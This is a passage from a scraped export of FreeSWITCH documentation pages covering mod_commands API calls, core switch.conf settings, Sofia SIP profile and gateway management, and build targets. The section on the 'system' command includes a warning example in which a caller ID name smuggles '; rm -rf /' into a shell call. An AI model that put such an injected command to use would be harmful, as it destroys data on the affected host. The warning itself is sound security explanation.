by one. limit_interval_reset Reset the interval counter to zero prior to the start of the next interval. 
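Putting the uuid_record usage above together, a minimal fs_cli session might look like this (the UUID, path, and limit are placeholders, not values from this page):

```shell
freeswitch> uuid_record 336889f2-1868-11de-81a9-3f4acc8e505e start /tmp/myrecording.wav 300
freeswitch> uuid_record 336889f2-1868-11de-81a9-3f4acc8e505e mask /tmp/myrecording.wav
freeswitch> uuid_record 336889f2-1868-11de-81a9-3f4acc8e505e unmask /tmp/myrecording.wav
freeswitch> uuid_record 336889f2-1868-11de-81a9-3f4acc8e505e stop /tmp/myrecording.wav
```

The trailing 300 on start is the optional limit in seconds; stop must name the same path, or "all" to remove every recording on this uuid.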
Miscellaneous Commands bg_system Execute a system command in the background.Usage: bg_system echo Echo input back to the consoleUsage: echo Example:echo This text will appearThis text will appear file_exists Tests whether filename exists.file_exists filenameExamples:freeswitch\u0026gt; file_exists /tmp/real_filetrue\nfreeswitch\u0026gt; file_exists /tmp/missing_filefalseExample dialplan usage:file_exists example\nfile_exists tests whether FreeSWITCH can see the file, but the file may still be unreadable because of restrictive permissions.\nfind_user_xml Checks to see if a user exists. Matches user tags found in the directory, similar to user_exists, but returns an XML representation of the user as defined in the directory (like the one shown in user_exists).Usage: find_user_xml references a key specified in a directory\u0026rsquo;s user tag represents the value of the key is the domain to which the user is assigned. list_users Lists Users configured in DirectoryUsage:list_users [group ] [domain ] [user ] [context ]Examples:freeswitch@localhost\u0026gt; list_users group default\nuserid|context|domain|group|contact|callgroup|effective_caller_id_name|effective_caller_id_number2000|default|192.168.20.73|default|sofia/internal/sip:2000@192.168.20.219:5060|techsupport|B#-Test 2000|20002001|default|192.168.20.73|default|sofia/internal/sip:2001@192.168.20.150:63412;rinstance=8e2c8b86809acf2a|techsupport|Test 2001|20012002|default|192.168.20.73|default|error/user_not_registered|techsupport|Test 2002|20022003|default|192.168.20.73|default|sofia/internal/sip:2003@192.168.20.149:5060|techsupport|Test 2003|20032004|default|192.168.20.73|default|error/user_not_registered|techsupport|Test 2004|2004\n+OKSearch filters can be combined:freeswitch@localhost\u0026gt; list_users group default user 2004\nuserid|context|domain|group|contact|callgroup|effective_caller_id_name|effective_caller_id_number2004|default|192.168.20.73|default|error/user_not_registered|techsupport|Test 
2004|2004\n+OK sched_api Schedule an API call in the future.Usage:sched_api [+@] \u0026lt;group_name\u0026gt; \u0026lt;command_string\u0026gt;[\u0026amp;] is the UNIX timestamp at which the command should be executed. If it is prefixed by +, specifies the number of seconds to wait before executing the command. If prefixed by @, it will execute the command periodically every seconds; for the first instance it will be executed after seconds.\u0026lt;group_name\u0026gt; will be the value of \u0026ldquo;Task-Group\u0026rdquo; in generated events. \u0026ldquo;none\u0026rdquo; is the proper value for no group. If set to the UUID of a channel (example: ${uuid}), the task will automatically be unscheduled when the channel hangs up.\u0026lt;command_string\u0026gt; is the command to execute at the scheduled time.A scheduled task or group of tasks can be revoked with sched_del or unsched_api.You could append the \u0026ldquo;\u0026amp;\u0026rdquo; symbol to the end of the line to execute this command in its own thread.Example:sched_api +1800 none originate sofia/internal/1000%${sip_profile} \u0026amp;echo()sched_api @600 check_sched log Periodic task is running\u0026hellip;sched_api +10 ${uuid} chat verto|fs@mydomain.com|1000@mydomain.com|Hello World sched_broadcast Play a file to a specific call in the future.Usage:sched_broadcast [[+]|@time] [aleg|bleg|both]Schedule execution of an application on a chosen leg(s) with optional hangup:sched_broadcast [+] app[![hangup_cause]]::args [aleg|bleg|both] is the UNIX timestamp at which the command should be executed. If it is prefixed by +, specifies the number of seconds to wait before executing the command. 
If prefixed by @, it will execute the command periodically every seconds; for the first instance it will be executed after seconds.Examples:sched_broadcast +60 336889f2-1868-11de-81a9-3f4acc8e505e commercial.wav bothsched_broadcast +60 336889f2-1868-11de-81a9-3f4acc8e505e say::en\\snumber\\spronounced\\s12345 aleg sched_del Removes a prior scheduled group or task IDUsage:sched_del \u0026lt;group_name|task_id\u0026gt;The one argument can either be a group of prior scheduled tasks or the returned task-id from sched_api.sched_transfer, sched_hangup and sched_broadcast commands add new tasks with group names equal to the channel UUID. Thus, sched_del with the channel UUID as the argument will remove all previously scheduled hangups, transfers and broadcasts for this channel.Examples:sched_del my_groupsched_del 2 sched_hangup Schedule a running call to hangup.Usage:sched_hangup [+] []sched_hangup +0 is the same as uuid_kill sched_transfer Schedule a transfer for a running call.Usage:sched_transfer [+] [] [] stun Executes a STUN lookup.Usage:stun [:port]Example:stun stun.freeswitch.org system Execute a system command.Usage:system The is passed to the system shell, where it may be expanded or interpreted in ways you don\u0026rsquo;t expect. This can lead to security bugs if you\u0026rsquo;re not careful. For example, the following command is dangerous:If a malicious remote caller somehow sets his caller ID name to \u0026ldquo;; rm -rf /\u0026rdquo; you would unintentionally be executing this shell command:log_caller_name; rm -rf /This would be a Bad Thing. time_test Runs a test to see how bad timer jitter is. It runs the test times if specified, otherwise it uses the default count of 10, and tries to sleep for mss microseconds. 
It returns the actual timer duration along with an average.Usage:time_test [count]Example:time_test 100 5\ntest 1 sleep 100 99test 2 sleep 100 97test 3 sleep 100 96test 4 sleep 100 97test 5 sleep 100 102avg 98 timer_test Runs a test to see how bad timer jitter is. Unlike time_test, this uses the actual FreeSWITCH timer infrastructure to do the timer test and exercises the timers used for call processing.Usage:timer_test \u0026lt;10|20|40|60|120\u0026gt; [\u0026lt;1..200\u0026gt;] [\u0026lt;timer_name\u0026gt;]The first argument is the timer interval.The second is the number of test iterations.The third is the timer name; \u0026ldquo;show timers\u0026rdquo; will give you a list.Example:timer_test 20 3\nAvg: 16.408ms Total Time: 49.269ms\n2010-01-29 12:01:15.504280 [CONSOLE] mod_commands.c:310 Timer Test: 1 sleep 20 92542010-01-29 12:01:15.524351 [CONSOLE] mod_commands.c:310 Timer Test: 2 sleep 20 200422010-01-29 12:01:15.544336 [CONSOLE] mod_commands.c:310 Timer Test: 3 sleep 20 19928 tone_detect Start Tone Detection on a channel.Usage:tone_detect \u0026lt;tone_spec\u0026gt; [ ] is required when this is executed as an api call; as a dialplan app the uuid is implicit as part of the channel variables is an arbitrary name that identifies this tone_detect instance; required\u0026lt;tone_spec\u0026gt; frequencies to detect; required \u0026lsquo;r\u0026rsquo; or \u0026lsquo;w\u0026rsquo; to specify which direction to monitor duration during which to detect tones;0 = detect forever+time = number of milliseconds after tone_detect is executedtime = absolute time to stop in seconds since The Epoch (1 January, 1970) FS application to execute when tone_detect is triggered; if app is omitted, only an event will be returned arguments to application enclosed in single quotes the number of times tone_detect should be triggered before executing the specified appOnce tone_detect returns a result, it will not trigger again until reset. 
Reset tone_detect by calling tone_detect with no additional arguments to reactivate the previously specified tone_detect declaration.See also http://wiki.freeswitch.org/wiki/Misc._Dialplan_Tools_tone_detect unsched_api Unschedule a previously scheduled API command.Usage:unsched_api \u0026lt;task_id\u0026gt; url_decode Usage:url_decode url_encode Url encode a string.Usage:url_encode user_data Retrieves user information (parameters or variables) as defined in the FreeSWITCH user directory.Usage:user_data @ \u0026lt;attr|var|param\u0026gt; is the user\u0026rsquo;s id is the user\u0026rsquo;s domain\u0026lt;attr|var|param\u0026gt; specifies whether the requested data is contained in the \u0026ldquo;variables\u0026rdquo; or \u0026ldquo;parameters\u0026rdquo; section of the user\u0026rsquo;s record is the name (key) of the variable to retrieveExamples:user_data 1000@192.168.1.101 param passwordwill return a result of 1234, anduser_data 1000@192.168.1.101 var accountcodewill return a result of 1000 from the example user shown in user_exists, anduser_data 1000@192.168.1.101 attr idwill return the user\u0026rsquo;s actual alphanumeric ID (i.e. \u0026ldquo;john\u0026rdquo;) when number-alias=\u0026ldquo;1000\u0026rdquo; was set as an attribute for that user. user_exists Checks to see if a user exists. 
Matches user tags found in the directory and returns either true/false:Usage:user_exists references a key specified in a directory\u0026rsquo;s user tag represents the value of the key is the domain to which the user belongsExample:user_exists id 1000 192.168.1.101will return true where there exists in the directory a user with a key called id whose value equals 1000:User Directory EntryIn the above example, we also could have tested for randomvar:user_exists randomvar 45 192.168.1.101And we would have received the same true result, but:user_exists accountcode 1000 192.168.1.101oruser_exists vm-password 1000 192.168.1.101Would have returned false.\n","permalink":"https://wdd.js.org/freeswitch/mod-command/","summary":"Usage CLI See below. API/Event Interfaces mod_event_socket mod_erlang_event mod_xml_rpc Scripting Interfaces mod_perl mod_v8 mod_python mod_lua From the Dialplan An API command can be called from the dialplan. Example:Invoke API Command From DialplanOther examples:Other Dialplan API Command ExamplesAPI commands with multiple arguments usually have the arguments separated by a space:Multiple Arguments\nDialplan UsageIf you are calling an API command from the dialplan make absolutely certain that there isn\u0026rsquo;t already a dialplan application that gives you the functionality you are looking for.","title":"mod_commands"},{"content":"The FreeSWITCH core configuration is contained in autoload_configs/switch.conf.xml\nDefault key bindings Function keys can be mapped to API commands using the following configuration:The default keybindings are;F1 = helpF2 = statusF3 = show channelsF4 = show callsF5 = sofia statusF6 = reloadxmlF7 = console loglevel 0F8 = console loglevel 7F9 = sofia status profile internalF10 = sofia profile internal siptrace onF11 = sofia profile internal siptrace offF12 = versionBeware that the option loglevel is actually setting the minimum hard_log_Level in the application. 
What this means is that if you set this to something other than DEBUG, then no matter what log level you set the console to once you start up, you will not be able to get any log messages below the level you set. Also be careful of mis-typing a log level: if the log level is not correct it will default to a hard_log_level of 0. This means that virtually no log messages will show up anywhere. Core parameters core-db-dsn Allows use of an ODBC database instead of sqlite3 for the FreeSWITCH core.Syntax: dsn:user:pass max-db-handles Maximum number of simultaneous DB handles open db-handle-timeout Maximum number of seconds to wait for a new DB handle before failing disable-monotonic-timing (bool) disables monotonic timer/clock support if it is broken on your system. enable-use-system-time Enables FreeSWITCH to use system time. initial-event-threads Number of event dispatch threads to allocate in the core. Default is 1.If you see the WARNING \u0026ldquo;Create additional event dispatch thread\u0026rdquo; on a heavily loaded server, you could increase the number of threads to prevent the system from falling behind. loglevel amount of detail to show in log max-sessions limits the total number of concurrent channels on your FreeSWITCH™ system. sessions-per-second throttling mechanism, the switch will only create this many channels at most, per second. rtp-start-port RTP port range begin rtp-end-port RTP port range end Variables Variables are default channel variables set on each channel automatically. 
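The core parameters above are set as param elements in autoload_configs/switch.conf.xml. A hedged sketch (the values shown are illustrative, not recommendations):

```xml
<configuration name="switch.conf" description="Core Configuration">
  <settings>
    <!-- hard ceiling on concurrent channels -->
    <param name="max-sessions" value="1000"/>
    <!-- throttle: create at most this many new channels per second -->
    <param name="sessions-per-second" value="30"/>
    <!-- RTP port range -->
    <param name="rtp-start-port" value="16384"/>
    <param name="rtp-end-port" value="32768"/>
    <!-- minimum hard log level; see the warning above -->
    <param name="loglevel" value="debug"/>
    <param name="initial-event-threads" value="1"/>
  </settings>
</configuration>
```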
Example config ","permalink":"https://wdd.js.org/freeswitch/xml-config/","summary":"The FreeSWITCH core configuration is contained in autoload_configs/switch.conf.xml\nDefault key bindings Function keys can be mapped to API commands using the following configuration:The default keybindings are;F1 = helpF2 = statusF3 = show channelsF4 = show callsF5 = sofia statusF6 = reloadxmlF7 = console loglevel 0F8 = console loglevel 7F9 = sofia status profile internalF10 = sofia profile internal siptrace onF11 = sofia profile internal siptrace offF12 = versionBeware that the option loglevel is actually setting the minimum hard_log_Level in the application.","title":"XML Switch Configuration"},{"content":"Sofia is a SIP stack used by FreeSWITCH. When you see \u0026ldquo;sofia\u0026rdquo; anywhere in your configuration, think \u0026ldquo;This is SIP stuff.\u0026rdquo; It takes a while to master it all, so please be patient with yourself. SIP is a crazy protocol and it will make you crazy too if you aren\u0026rsquo;t careful. Read on for information on setting up SIP/Sofia in your FreeSWITCH configuration.\nmod_sofia exposes the Sofia API and sets up the FreeSWITCH SIP endpoint. Endpoint A FreeSWITCH endpoint represents a full user agent and controls the signaling protocol and media streaming necessary to process calls. The endpoint is analogous to a physical VoIP telephone sitting on your desk. It speaks a particular protocol such as SIP or Verto, to the outside world and interprets that for the FreeSWITCH core. Configuration Files sofia.conf.xml contains the configuration settings for mod_sofiaSee Sofia Configuration Files. SIP profiles See SIP profiles section in Configuring FreeSWITCH. What if these commands don\u0026rsquo;t work for me? Make sure that you are not running another SIP server at the same time as FreeSWITCH. It is not always obvious that another SIP server is running. 
If you type in Sofia commands such as \u0026lsquo;sofia status profile default\u0026rsquo; and it doesn\u0026rsquo;t work then you may have another SIP server running. Stop the other SIP server and restart FreeSWITCH.On Linux, you may wish to try, as a superuser (often \u0026ldquo;root\u0026rdquo;):netstat -lunp | less# -l show listeners, -u show only UDP sockets,# -n numeric output (do not translate addresses or UDP port numbers)# -p show process information (PID, command). Only the superuser is allowed to see this infoWith the less search facility (usually the keystroke \u0026ldquo;/\u0026rdquo;), look for :5060 which is the usual SIP port.To narrow the focus, you can use grep. In the example configs, port 5060 is the \u0026ldquo;internal\u0026rdquo; profile. Try this:netstat -lnp | grep 5060See if something other than FreeSWITCH is using port 5060. Sofia Recover sofia recoverYou can ask Sofia to recover calls that were up, after crashing (or other scenarios).Sofia recover can also be used if your core db uses ODBC to achieve HA / failover.For FreeSWITCH HA configuration, see Freeswitch HA. Flushing and rebooting registered endpoints You can flush a registration or reboot a specific registered endpoint by issuing a flush_inbound_reg command from the console.freeswitch\u0026gt; sofia profile \u0026lt;profile_name\u0026gt; flush_inbound_reg [\u0026lt;call_id\u0026gt;|user@host] [reboot]If you leave out \u0026lt;call_id\u0026gt; and/or user@host, you will flush/reboot every registered endpoint on a profile.\nNote: For Polycom phones, the command causes the phone to check its configuration from the server. If the file is different (you may add an extra space at the end of the file), the phone will reboot. You should not change the value of voIpProt.SIP.specialEvent.checkSync.alwaysReboot=\u0026ldquo;0\u0026rdquo; to \u0026ldquo;1\u0026rdquo; in sip.cfg as that allows a potential DoS attack on the phone. 
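As a concrete sketch of the flush_inbound_reg forms above (the profile name, user, and address are placeholders):

```shell
# flush one registration on the internal profile
freeswitch> sofia profile internal flush_inbound_reg 1000@192.168.1.100
# reboot every registered endpoint on the profile
freeswitch> sofia profile internal flush_inbound_reg reboot
```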
You can also use the check_sync command:sofia profile \u0026lt;profile_name\u0026gt; check_sync \u0026lt;call_id\u0026gt; | user@domain\nNote: The polycom phones do not reload -directory.xml configuration in response to either of these commands, they only reload the configuration. If you want new speed dials to take effect, you\u0026rsquo;ll need to do a full reboot of the phone or enable the alwaysReboot option. (Suggestions from anyone with more detailed PolyCom knowledge would be appreciated here.) Starting a new profile If you have created a new profile you need to start it from the console:freeswitch\u0026gt; sofia profile \u0026lt;new_profile_name\u0026gt; start Reloading profiles and gateways You can reload a specific SIP profile by issuing a rescan/restart command from the consolefreeswitch\u0026gt; sofia profile \u0026lt;profile_name\u0026gt; [|] reloadxmlThe difference between rescan and restart is that rescan will just load new config and not stop FreeSWITCH from processing any more calls on a profile.** Some config options like IP address and (UDP) port are not reloaded with rescan.** Deleting gateways You can delete a specific gateway by issuing a killgw command from the console. If you use all as gateway name, all gateways will be killedfreeswitch\u0026gt; sofia profile \u0026lt;profile_name\u0026gt; killgw \u0026lt;gateway_name\u0026gt; Restarting gateways You can force a gateway to restart ( good for forcing a re-registration or similar ) by issuing a killgw command from the console followed by a profile rescan. This is safe to perform on a profile that has active calls.freeswitch\u0026gt; sofia profile \u0026lt;profile_name\u0026gt; killgw \u0026lt;gateway_name\u0026gt;freeswitch\u0026gt; sofia profile \u0026lt;profile_name\u0026gt; rescan Adding / Changing Existing Gateways It will be assumed that you have all your gateways in the /usr/local/freeswitch/conf/sip_profiles/external directory and that you have just created a new entry. 
You can add a new gateway to FreeSWITCH by issuing a rescan reloadxml command from the console as seen in the example below. This will load the newly created gateway and not affect any calls that are currently up.freeswitch\u0026gt; sofia profile external rescan reloadxml\nYou now realize that you have screwed up the IP address in the new gateway and need to change it. So you edit your gateway file and make any changes that you want. You will then need to issue the following commands to destroy the gateway, and then have FreeSWITCH reload the changes without affecting any existing calls that are currently up.\nfreeswitch\u0026gt; sofia profile external killgw \u0026lt;gateway_name\u0026gt;freeswitch\u0026gt; sofia profile external rescan reloadxml View SIP Registrations You can view all the devices that have registered by running the following from the console.freeswitch\u0026gt; sofia status profile regfreeswitch\u0026gt; sofia status profile default regfreeswitch\u0026gt; sofia status profile outbound regYou can also use the xmlstatus key to retrieve statuses in XML format. This is especially useful if you are using mod_xml_rpc.Commands are as follows:freeswitch\u0026gt; sofia xmlstatus profile regfreeswitch\u0026gt; sofia xmlstatus profile default regfreeswitch\u0026gt; sofia xmlstatus profile outbound reg List the status of gateways For the gateways that are in-service:freeswitch\u0026gt; sofia profile gwlist upFor the gateways that are out-of-service:freeswitch\u0026gt; sofia profile gwlist downNotes:\nIt should be used together with . See Sofia_Configuration_Files It can also be used to feed into mod_distributor to exclude dead gateways. 
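The full edit-and-reload cycle described above, as one console sketch (the gateway name is a placeholder):

```shell
freeswitch> sofia profile external killgw my_gateway
freeswitch> sofia profile external rescan reloadxml
# confirm the gateway came back in-service
freeswitch> sofia profile external gwlist up
```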
List gateway data To retrieve the value of an inbound variable:sofia_gateway_data \u0026lt;gateway_name\u0026gt; ivar To retrieve the value of an outbound variable:sofia_gateway_data \u0026lt;gateway_name\u0026gt; ovar To retrieve the value of either use:sofia_gateway_data \u0026lt;gateway_name\u0026gt; var This first checks for an inbound variable, then checks for an outbound variable if there\u0026rsquo;s no matching inbound. View User Presence Data Displays presence data from registered devices as seen by the serverUsage:sofia_presence_data [list|status|rpid|user_agent] [profile/]@domainsofia_presence_data list */2005status|rpid|user_agent|network_ip|network_portAway|away|Bria 3 release 3.5.1 stamp 69738|192.168.20.150|21368+OK\nIt\u0026rsquo;s possible to retrieve only one value: sofia_presence_data status */2005Away\nYou can use this value in the dialplan, e.g. Debugging Sofia-SIP The Sofia-SIP components can output various debugging information. The detail of the debugging output is determined by the debugging level. The level is usually module-specific and it can be modified by a module-specific environment variable. 
There is also a default level for all modules, controlled by environment variable #SOFIA_DEBUG.The environment variables controlling the logging and other debug output are as follows:- #SOFIA_DEBUG Default debug level (0..9)- #NUA_DEBUG User Agent engine (nua) debug level (0..9)- #SOA_DEBUG SDP Offer/Answer engine (soa) debug level (0..9)- #NEA_DEBUG Event engine (nea) debug level (0..9)- #IPTSEC_DEBUG HTTP/SIP authentication module debug level (0..9)- #NTA_DEBUG Transaction engine debug level (0..9)- #TPORT_DEBUG Transport event debug level (0..9)- #TPORT_LOG If set, print out all parsed SIP messages on transport layer- #TPORT_DUMP Filename for dumping unparsed messages from transport- #SU_DEBUG su module debug level (0..9)The defined debug output levels are:- 0 SU_DEBUG_0() - fatal errors, panic- 1 SU_DEBUG_1() - critical errors, minimal progress at subsystem level- 2 SU_DEBUG_2() - non-critical errors- 3 SU_DEBUG_3() - warnings, progress messages- 5 SU_DEBUG_5() - signaling protocol actions (incoming packets, \u0026hellip;)- 7 SU_DEBUG_7() - media protocol actions (incoming packets, \u0026hellip;)- 9 SU_DEBUG_9() - entering/exiting functions, very verbatim progressStarting with 1.0.4, those parameters can be controlled from the console by doingfreeswitch\u0026gt; sofia loglevel \u0026lt;all|default|tport|iptsec|nea|nta|nth_client|nth_server|nua|soa|sresolv|stun\u0026gt; [0-9]\u0026ldquo;all\u0026rdquo; Will change every component\u0026rsquo;s loglevelA log level of 0 turns off debugging, to turn them all off, you can dofreeswitch\u0026gt; sofia loglevel all 0To report a bug, you can turn on debugging with more verbosesofia global siptrace onsofia loglevel all 9sofia tracelevel alertconsole loglevel debugfsctl debug_level 10 Debugging presence and SLA As of Jan 14, 2011, sofia supports a new debugging command: sofia global debug. It can turn on debugging for SLA, presence, or both. 
Usage is:sofia global debug slasofia global debug presencesofia global debug noneThe first two enable debugging SLA and presence, respectively. The third one turns off SLA and/or presence debugging. Sample Export (Linux/Unix) Alternatively, the levels can also be read from environment variables. The following bash commands turn on all debugging levels, and is equivalent to \u0026ldquo;sofia loglevel all 9\u0026rdquo;export SOFIA_DEBUG=9export NUA_DEBUG=9export SOA_DEBUG=9export NEA_DEBUG=9export IPTSEC_DEBUG=9export NTA_DEBUG=9export TPORT_DEBUG=9export TPORT_LOG=9export TPORT_DUMP=/tmp/tport_sip.logexport SU_DEBUG=9To turn this debugging off again, you have to exit FreeSWITCH and type unset. For example:unset TPORT_LOG Sample Set (Windows) The following bash commands turn on all debugging levels.set SOFIA_DEBUG=9set NUA_DEBUG=9set SOA_DEBUG=9set NEA_DEBUG=9set IPTSEC_DEBUG=9set NTA_DEBUG=9set TPORT_DEBUG=9set TPORT_LOG=9set TPORT_DUMP=/tmp/tport_sip.logset SU_DEBUG=9To turn this debugging off again, you have to exit FreeSWITCH and type unset. 
For example:set TPORT_LOG=You can also control SIP Debug output within fs_cli, the FreeSWITCH client app.freeswitch\u0026gt; sofia profile siptrace on|offOn newer software releases, you can issue siptrace for all profiles:sofia global siptrace [on|off]\nTo have the SIP Debug details put in the /usr/local/freeswitch/log/freeswitch.log file, usefreeswitch\u0026gt; sofia tracelevel info (or any other loglevel name or number)To have the SIP details put into the log file automatically on startup, add this to sofia.conf.xml:\u0026lt;global_settings\u0026gt;\u0026hellip;\u0026hellip;\u0026lt;/global_settings\u0026gt;\nand the following to the sip profile xml file:\u0026hellip;\u0026hellip;\u0026hellip;\u0026hellip;\nProfile Configurations Track Call ACL You can restrict access by IP address for either REGISTERs or INVITEs (or both) by using the following options in the sofia profile.See ACL for other access controlsSee acl.conf.xml for list configuration Disabling Hold Disable all calls on this profile from putting the call on hold:\nSee also: rtp_disable_hold variable Using A Single Domain For All Registrations You can force all registrations in a particular profile to use a single domain. In other words, you can ignore the domain in the SIP message. You will need to modify several sofia profile settings. challenge realm auto_from - uses the from field as the value for the SIP realm. auto_to - uses the to field as the value for the SIP realm. - you can input any value to use for the SIP realm. 
force-register-domain Preference Weight Transport Port Address================================================================================1 0.500 udp 5060 74.51.38.151 0.500 tcp 5060 74.51.38.15 Flushing Inbound Registrations From time to time, you may need to kill a registration.You can kill a registration from the CLI, or anywhere that accepts API commands with a command similar to the following:sofia profile \u0026lt;profile_name_here\u0026gt; flush_inbound_reg [optional_callid] Dial out of a gateway Basic form:sofia/gateway//\u0026lt;number_to_dial\u0026gt;Example 1:sofia/gateway/asterlink/18005551212gateway: is a keyword and not a \u0026ldquo;gateway\u0026rdquo; name. It has special meaning and tells the stack which credentials to use when challenged for the call. is the actual name of the gateway through which you want to send the call\nYour available gateways (usually configured in conf/sip_profiles/external/*.xml) will show up in sofia status:freeswitch#\u0026gt; sofia status\nName Type Data State=================================================================================================default profile sip:mod_sofia@2.3.4.5:5060 RUNNING (2)mygateway gateway sip:username@1.2.3.4 NOREGphonebooth.example.com alias default ALIASED=================================================================================================1 profile 1 alias Modifying the To: header You can override the To: header by appending ^.Example 1:sofia/foo/user%192.168.1.1^101@$${domain}\nSpecifying SIP Proxy With fs_path You can route a call through a specific SIP proxy by using the \u0026ldquo;fs_path\u0026rdquo; directive. 
Example:sofia/foo/user@that.domain;fs_path=sip:proxy.this.domain Safe SIP URI Formatting As of commit https://freeswitch.org/stash/projects/FS/repos/freeswitch/commits/76370f4d1767bb0dcf828a3d6cde6e015b2cfa03 the User part of the SIP URI has been \u0026ldquo;safely\u0026rdquo; encoded in the case where spaces or other special characters appear.\nChannel Variables Adding Request Headers You can add arbitrary headers to outbound SIP calls by prefixing the string \u0026lsquo;sip_h_\u0026rsquo; to any channel variable, for example:Note that for BYE requests, you will need to use the prefix \u0026lsquo;sip_bye_h_\u0026rsquo; on the channel variable.\nWhile not required, you should prefix your headers with \u0026ldquo;X-\u0026rdquo; to avoid issues with interoperability with other SIP stacks.All inbound SIP calls will install any X- headers into local variables.This means you can easily bridge any X- header from one FreeSWITCH instance to another.To access the header above on a 2nd box, use the channel variable ${sip_h_X-Answer}It is important to note that the syntax ${sip_h_custom-header} can\u0026rsquo;t be used to retrieve any custom header not starting with X-.It is because Sofia only reads and puts into variables custom headers starting with X-.\nAdding Response Headers There are three types of response header prefixes that can be set:\nResponse headersip_rh_ Provisional response headersip_ph_ Bye response headersip_bye_h_ Each prefix will exclusively add headers for their given types of requests - there is no \u0026ldquo;global\u0026rdquo; response header prefix that will add a header to all response messages.For example:\nAdding Custom Headers For instance, you may need P-Charge-Info to append to your INVITE header, you may do as follows:Then, you would see it in SIP message:INVITE sip:19099099099@1.2.3.4 SIP/2.0Via: SIP/2.0/UDP 5.6.7.8:5080;rport;branch=z9hG4bKyg61X9v3gUD4gMax-Forwards: 69From: \u0026ldquo;DJB\u0026rdquo; 
sip:2132132132@5.6.7.8;tag=XQKQ322vQF5gKTo: sip:19099099099@1.2.3.4Call-ID: b6c776f6-47ed-1230-0085-000f1f659e58CSeq: 30776798 INVITEContact: sip:mod_sofia@5.6.7.8:5080User-Agent: FreeSWITCH-mod_sofia/1.2.0-rc2+git~20120713T162602Z~0afd7318bd+unclean~20120713T184029ZAllow: INVITE, ACK, BYE, CANCEL, OPTIONS, MESSAGE, UPDATE, INFO, REGISTER, REFER, NOTIFYSupported: timer, precondition, path, replacesAllow-Events: talk, hold, conference, referContent-Type: application/sdpContent-Disposition: sessionContent-Length: 229P-Charge-Info: sip:2132132132@5.6.7.8;npi=0;noa=3X-FS-Support: update_display,send_info.Remote-Party-ID: \u0026ldquo;DJB\u0026rdquo; sip:2132132132@5.6.7.8;party=calling;screen=yes;privacy=off Strip Individual SIP Headers Sometimes a SIP provider will add extra header information. Most of the time they do that for their own use (tracking calls). But that extra information can cause a lot of problems. For example: I get a call from the PSTN via a DID provider (provider1). Since I\u0026rsquo;m not in the office the call gets bridged to my cell phone (provider2). Provider1 adds extra information to the SIP packet as displayed below:X-voipnow-did: 01234567890X-voipnow-extension: 987654321\u0026hellip;In some scenarios, when we bridge this call directly to provider2 the call gets dropped, since provider2 doesn\u0026rsquo;t accept the X-voipnow header, so we have to strip off those SIP headers.To strip them off, use the application UNSET in the dialplan (the inverse of SET):\u0026hellip; Strip All custom SIP Headers If you wish to strip all custom headers while keeping only those defined in the dialplan:\u0026hellip; Additional Channel variables Additional variables may also be set to influence the way calls are handled by sofia.For example, contacts can be filtered by setting the \u0026lsquo;sip_exclude_contact\u0026rsquo; variable. 
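The UNSET approach for the X-voipnow example above can be sketched as a dialplan fragment (the extension and gateway names are illustrative, not from the original page):

```xml
<extension name="strip_provider_headers">
  <condition field="destination_number" expression="^(\d+)$">
    <!-- unset is the inverse of set: drop the provider's custom headers -->
    <action application="unset" data="sip_h_X-voipnow-did"/>
    <action application="unset" data="sip_h_X-voipnow-extension"/>
    <action application="bridge" data="sofia/gateway/provider2/$1"/>
  </condition>
</extension>
```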
Example:Or you can perform SIP Digest authorization on outgoing calls by setting sip_auth_username and sip_auth_password variables to avoid using Gateways to authenticate. Example:Changing the SIP Contact user FreeSWITCH normally uses mod_sofia@ip:port for the internal SIP contact. To change this to foo@ip:port, there is a variable, sip_contact_user:{sip_contact_user=foo}sofia/my_profile/1234@192.168.0.1;transport=tcp sip_renegotiate_codec_on_reinvite true|false sip_recovery_break_rfc true|false Transcoding Issues G729 and G723 will not let you transcode because of licensing issues. Calls will fail if, for example, the originating endpoint has G729 at higher priority and the receiving endpoint has G723 at highest priority. The logic is to fail the call rather than attempt to find a codec match. If you are having issues due to transcoding you may disable transcoding and both endpoints will negotiate the compatible codec rather than just fail the call.disable-transcoding will take the preferred codec from the inbound leg of your call and only offer that codec on the outbound leg.Add the following setting to your sofia profile\nExample:\nCustom Events The following are events that can be subscribed to via Event Socket\nRegistration sofia::register* sofia::pre_register* sofia::register_attempt* sofia::register_failure* sofia::unregister - explicit unregister calls* sofia::expire - when a user registration expires Gateways sofia::gateway_add* sofia::gateway_delete* sofia::gateway_state - when a gateway is detected as down or back up Call recovery sofia::recovery_send* sofia::recovery_recv* sofia::recovery_recovered Other sofia::notify_refer* sofia::reinvite* sofia::error FAQ Does it use UDP or TCP? 
By default it uses both, but you can add ;transport=tcp to the Sofia URL to force it to use TCP.For example:sofia/profile/foo@bar.com;transport=tcpAlso there is a parameter in the gateway config:That will cause it to use the TCP transport for the registration and all subsequent SIP messages.Not sure if this is needed or what it does, but the following can also be used in gateway settings:\n","permalink":"https://wdd.js.org/freeswitch/sofia-stack/","summary":"Sofia is a SIP stack used by FreeSWITCH. When you see \u0026ldquo;sofia\u0026rdquo; anywhere in your configuration, think \u0026ldquo;This is SIP stuff.\u0026rdquo; It takes a while to master it all, so please be patient with yourself. SIP is a crazy protocol and it will make you crazy too if you aren\u0026rsquo;t careful. Read on for information on setting up SIP/Sofia in your FreeSWITCH configuration.\nmod_sofia exposes the Sofia API and sets up the FreeSWITCH SIP endpoint.","title":"Sofia SIP Stack"},{"content":" make clean - Cleans the build environment make current - Cleans build environment, performs a git update, then does a make install make core_install (or make install_core) - Recompiles and installs just the core files. Handy if you are working on a core file and want to recompile without doing the whole shebang. make mod_XXXX-install - Recompiles and installs just a single module. Here are some examples: make mod_openzap-install make mod_sofia-install make mod_lcr-install make samples - This will not replace your configuration. This will instead make the default extensions and dialplan to run the basic configuration of FreeSWITCH. ","permalink":"https://wdd.js.org/freeswitch/compile-fs/","summary":"make clean - Cleans the build environment make current - Cleans build environment, performs a git update, then does a make install make core_install (or make install_core) - Recompiles and installs just the core files. 
